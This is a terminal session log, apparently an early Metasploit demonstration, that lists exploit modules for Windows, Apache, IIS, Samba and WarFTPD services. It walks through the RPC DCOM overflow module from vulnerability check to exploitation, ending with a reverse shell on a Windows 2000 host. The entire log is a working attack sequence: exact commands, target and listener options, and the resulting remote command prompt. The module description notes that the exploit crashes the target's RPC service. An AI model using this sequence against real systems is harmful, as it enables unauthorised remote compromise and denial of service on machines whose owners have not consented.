hdm@ice metasploit $ ls exp/*.exp exp/apache_chunked_win2k.exp exp/iis_nsiislog_win2k.exp exp/iis_webdav_win2k_sp3.exp exp/samba_trans2open.exp exp/apache_chunked_winnt.exp exp/iis_printer_win2k.exp exp/rpc_dcom_overflow.exp exp/warftpd_165_win2k.exp hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp Usage: ./metasploit [var=val] [MODE] Modes: (S)UMMARY Show various information about the module (O)PTIONS Show the available options for this module (P)AYLOADS Show available payloads for this module (C)HECK Determine if the target is vulnerable (E)XPLOIT Attempt to exploit the target hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp S ================== = Information Name: RPC DCOM Remote Overflow Version: 1.0 Author: H D Moore URL: http://www.metasploit.com/ This exploits the overflow found by LSD in the DCOM service available over RPC. This module has been tested against all english versions of Windows 2000 and Windows XP. The target must have DCOM enabled and TCP port 135 open. This exploit will crash the RPC service on the remote system regardless of whether it is succesful or not. hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp P ================== = Payloads Win32 Bind Shell Win32 Create User Win32 Reverse Shell hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp payload='Win32 Reverse Shell' O ================== = Module Options LHOST [R] IP address to send the shell to. RHOST [R] The target system's ip address. OS [R] The operating system of the target (2K, XP) LPORT [R] TCP port to send the shell to. RPORT [E] The port that the RPC service is listening on (135). hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp payload='Win32 Reverse Shell' rhost=192.168.0.166 rport=135 lhost=192.168.0.247 lport=3567 OS=2K C [*] Check: Vulnerable hdm@ice metasploit $ ./metasploit ./exp/rpc_dcom_overflow.exp payload='Win32 Reverse Shell' rhost=192.168.0.166 rport=135 lhost=192.168.0.247 lport=3567 OS=2K E [*] Generating payload Win32 Reverse Shell (x86, win32, reverse)... [*] Payload generation complete (668 bytes) [*] Using return address 0x with scratch pad at 0x7ffde0cc [*] Connection from 192.168.0.166:1085... Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-2000 Microsoft Corp. C:\WINNT\system32>exit [*] Connection closed hdm@ice metasploit $